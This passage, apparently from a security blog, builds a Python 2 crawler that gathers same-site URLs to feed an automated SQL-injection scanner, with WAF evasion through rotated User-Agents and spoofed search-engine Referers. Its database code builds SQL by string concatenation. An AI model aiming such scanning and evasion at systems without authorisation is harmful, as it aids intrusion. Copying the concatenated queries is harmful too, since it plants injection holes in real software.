Finally, as to whether there is an injection vulnerability, the code judges it like this: if the data field in the returned dictionary is non-empty, there is an injection.

Then I took the crawler module from https://github.com/smarttang/w3a_Scan_Console/blob/master/module/sprider_module.py and integrated it with a few tweaks:

#!/usr/bin/python
# vim: set fileencoding=utf-8:

import sys
import urllib2
import re
from BeautifulSoup import BeautifulSoup

import autosql

class SpriderUrl:
    # initialization
    def __init__(self,url):
        self.url=url
        #self.con=Db_Connector('sprider.ini')

# get the initial list of URLs from the target url
    def get_self(self):
        urls=[]
        try:
            body_text=urllib2.urlopen(self.url).read()
        except:
            print "[*] Web Get Error:checking the Url"
        soup=BeautifulSoup(body_text)
        links=soup.findAll('a')
        for link in links:
            # got the target's url, but it still needs processing
            _url=link.get('href')
            # next, run it through some checks:
            # first, check whether it starts with a meaningless prefix or is None
            # also check the URL suffix and skip extensions that are not worth crawling
            if re.match('^(javascript|:;|#)',_url) or _url is None or re.match('.(jpg|png|bmp|mp3|wma|wmv|gz|zip|rar|iso|pdf|txt|db)$',_url):
                continue
            # then check whether it starts with http|https; for those, make sure it stays on this site (no off-site crawling)
            if re.match('^(http|https)',_url):
                if not re.match('^'+self.url,_url):
                    continue
                else:
                    urls.append(_url)
            else:
                urls.append(self.url+_url)
        rst=list(set(urls))
        for rurl in rst:
            try:
                self.sprider_self_all(rurl)
                # recurse; the drawback is obvious: every page gets re-crawled repeatedly. Then hand it over to autosql
                # AutoSqli('http://127.0.0.1:8775', rurl).run
            except:
                print "spider error"

    def sprider_self_all(self,domain):
        urls=[]
        try:
            body_text=urllib2.urlopen(domain).read()
        except:
            print "[*] Web Get Error:checking the Url"
            sys.exit(0)
        soup=BeautifulSoup(body_text)
        links=soup.findAll('a')
        for link in links:
            # we have the raw href, but it still needs processing
            _url=link.get('href')
            # first skip None values and links that start with meaningless characters,
            # then skip file extensions we do not want to crawl
            try:
                if _url is None or re.match('^(javascript|:;|#)',str(_url)) or re.search('\.(jpg|png|bmp|mp3|wma|wmv|gz|zip|rar|iso|pdf|txt|db)$',str(_url)):
                    continue
            except TypeError:
                print "[*] Type is Error! :"+str(_url)
                continue
            # if it starts with http|https, only keep it when it belongs to this site; do not crawl beyond the site
            if re.match('^(http|https)',_url):
                if not re.match('^'+self.url,_url):
                    continue
                else:
                    urls.append(_url)
            else:
                urls.append(self.url+_url)
        res=list(set(urls))
        for rurl in res:
            try:
                print rurl
                #AutoSqli('http://127.0.0.1:8775', rurl).run()
            except:
                print "spider error"

spi="http://0day5.com/"
t=SpriderUrl(spi)
# first crawl
t.get_self()

The best approach is still to store the urls in a database and then check for duplicates:

        for rurl in res:
            # skip urls already recorded for this domain, otherwise insert them
            if self.con.find_item("select * from url_sprider where url='"+rurl+"' and domain='"+self.url+"'"):
                continue
            else:
                try:
                    self.con.insert_item("insert into url_sprider(url,tag,domain)values('"+rurl+"',0,'"+self.url+"')")
                except:
                    print "[*] insert error!"


Lately I've still been collecting notes on this crawler:

1. Many crawlers have obvious fingerprints; the countermeasure is to set an appropriate User-Agent.

2. Some WAFs can be bypassed via the Referer, for example by pretending the visit came from Baidu.

Improved it a bit:

    USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    ]

    REFERERS = [
    "https://www.baidu.com",
    "http://www.baidu.com",
    "https://www.google.com.hk",
    "http://www.so.com",
    "http://www.sogou.com",
    "http://www.soso.com",
    "http://www.bing.com",
    ]

    default_cookies = {}
    # pick a random User-Agent / Referer (requires `import random`)
    default_headers = {
        'User-Agent': random.choice(USER_AGENTS),
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Cache-Control': 'max-age=0',
        'Referer': random.choice(REFERERS),
        'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
    }
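
One thing to note: random.choice is evaluated only once when default_headers is built, so every request in a run reuses the same User-Agent/Referer pair. A small sketch (reusing USER_AGENTS, REFERERS and default_headers from above; the fetch helper itself is an assumption) that re-rolls both values per request and feeds them to the urllib2 calls the spider uses:

import random
import urllib2

def fetch(url):
    # choose a fresh User-Agent and Referer for every single request,
    # instead of fixing them once when default_headers is defined
    headers = dict(default_headers)
    headers['User-Agent'] = random.choice(USER_AGENTS)
    headers['Referer'] = random.choice(REFERERS)
    req = urllib2.Request(url, headers=headers)
    return urllib2.urlopen(req).read()

The body_text=urllib2.urlopen(...).read() lines in SpriderUrl could then call fetch() instead.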

Then there is still the filtering problem, i.e. a similarity check, so that the crawl results become more precise. The algorithm relies on decomposing the URL and hashing the decomposition, and it fits this kind of common requirement: a URL is split into three dimensions, the first being the netloc, the second the length of each path segment, and the third the sorted list of query parameter names. A data structure combining these three dimensions yields a hashable object. [From: http://drops.wooyun.org/tips/5462]

#!/usr/bin/env python
# coding:utf-8
import time
import os
import urlparse
import hashlib
import sys
sys.path.append("..")

# config.config is expected to define IGNORE_KEY_WORD and CUSTOM_KEY, both used below
from config.config import *
reload(sys)
sys.setdefaultencoding("utf-8")

SIMILAR_SET = set()
REPEAT_SET = set()

'''
2015.3.30
Be clear about what "focus" and "filter" mean for the crawler:
focus:  return True if the keyword is in the url, otherwise False

filter: return False if the keyword is in the url, otherwise True
'''


def format(url):
    '''
    The strategy is to build a 3-tuple:
    the first item is the url's netloc,
    the second item is the length of each segment of the path,
    the third item is the name of each query parameter (sorted alphabetically,
    to avoid duplicates caused only by a different parameter order).
    '''
    if urlparse.urlparse(url)[2] == '':
        url = url+'/'

    url_structure = urlparse.urlparse(url)
    netloc = url_structure[1]
    path = url_structure[2]
    query = url_structure[4]

    temp = (netloc,tuple([len(i) for i in path.split('/')]),tuple(sorted([i.split('=')[0] for i in query.split('&')])))
    #print temp
    return temp


def check_netloc_is_ip(netloc):
    '''
    Return True if the url's netloc is in IP form,
    otherwise return False.
    '''
    flag = 0
    t = netloc.split('.')
    for i in t:
        try:
            int(i)
            flag += 1
        except Exception, e:
            break
    if flag == 4:
        return True

    return False

def url_domain_control(url,keyword):
    '''
    URL domain control (focus)

    True  - the url passes the domain check
    False - the url does not pass the domain check

    1. keyword may be a list or a str
    2. if the url's netloc is in IP form, return True
    '''
    t = format(url)
    if check_netloc_is_ip(t[0]):
        return True

    elif isinstance(keyword, list):
        for i in keyword:
            if i.lower() in t[0].lower():
                return True

    elif isinstance(keyword, str):
        if keyword.lower() in t[0].lower():
            return True
    return False

def url_domain_control_ignore(url,keyword):
    '''
    URL domain control (filter)

    True  - no ignore keyword appears in the url's netloc
    False - an ignore keyword appears in the url's netloc

    For example: to ignore "blog", return False if the netloc contains "blog".
    '''
    t = format(url)
    for i in keyword:
        if i in t[0].lower():
            return False
    return True

def url_similar_control(url):
    '''
    URL similarity control

    True  - the url is not a duplicate
    False - the url is a duplicate
    '''
    t = format(url)
    if t not in SIMILAR_SET:
        SIMILAR_SET.add(t)
        return True
    return False


def url_format_control(url):
    '''
    URL format control (filter)

    True  - the url passes the format check
    False - the url does not pass the format check
    '''

    if '}' not in url and '404' not in url and url[0].lower() == 'h' and '/////' not in url and len(format(url)[1]) < 6:
        if len(format(url)[2]) > 0:
            for i in format(url)[2]:
                if len(i) > 20:
                    return False
        if 'viewthread' in url or 'forumdisplay' in url:
            return False
        return True
    return False

def url_custom_control(url):
    '''
    URL custom-keyword control (filter)

    True  - no keyword from CUSTOM_KEY appears in the url
    False - a keyword from CUSTOM_KEY appears in the url
    '''
    for i in CUSTOM_KEY:
        if i in url:
            return False
    return True

def url_custom_focus_control(url,focuskey):
    '''
    URL custom-keyword control (focus)

    True  - the url matches the focus strategy (or focuskey is empty)
    False - the url does not match the focus strategy
    '''
    if len(focuskey) == 0:
        return True
    for i in focuskey:
        if i in url:
            return True
    return False

def url_repeat_control(url):
    '''
    URL repetition control

    True  - the url has not been seen before
    False - the url is a repeat
    '''
    if url not in REPEAT_SET:
        REPEAT_SET.add(url)
        return True
    return False

def url_filter_similarity(url,keyword,ignore_keyword,focuskey):
    # note: the ignore_keyword argument is unused; the global IGNORE_KEY_WORD from config is used instead
    return (url_format_control(url) and url_similar_control(url)
                and url_domain_control(url,keyword) and url_domain_control_ignore(url,IGNORE_KEY_WORD)
                    and url_custom_control(url) and url_custom_focus_control(url,focuskey))

def url_filter_no_similarity(url,keyword,ignore_keyword,focuskey):
    return (url_format_control(url) and url_repeat_control(url)
                and url_domain_control(url,keyword) and url_domain_control_ignore(url,IGNORE_KEY_WORD)
                    and url_custom_control(url) and url_custom_focus_control(url,focuskey))


if __name__ == "__main__": 
    print url_format_control("http://www.gznu.edu.cn")
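
Finally, a hedged sketch of how these filters could be wired back into the spider above; the urlfilter module name and the keyword choice are assumptions, and the empty lists simply leave the ignore/focus checks inactive:

# hypothetical glue between SpriderUrl and the filter module above;
# "urlfilter" as a module name and the keyword value are assumptions
import urlfilter

def handle_link(rurl, site_keyword):
    # keep the url only if it passes the format/similarity/domain/custom checks
    if urlfilter.url_filter_similarity(rurl, site_keyword, [], []):
        print rurl
        # AutoSqli('http://127.0.0.1:8775', rurl).run()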
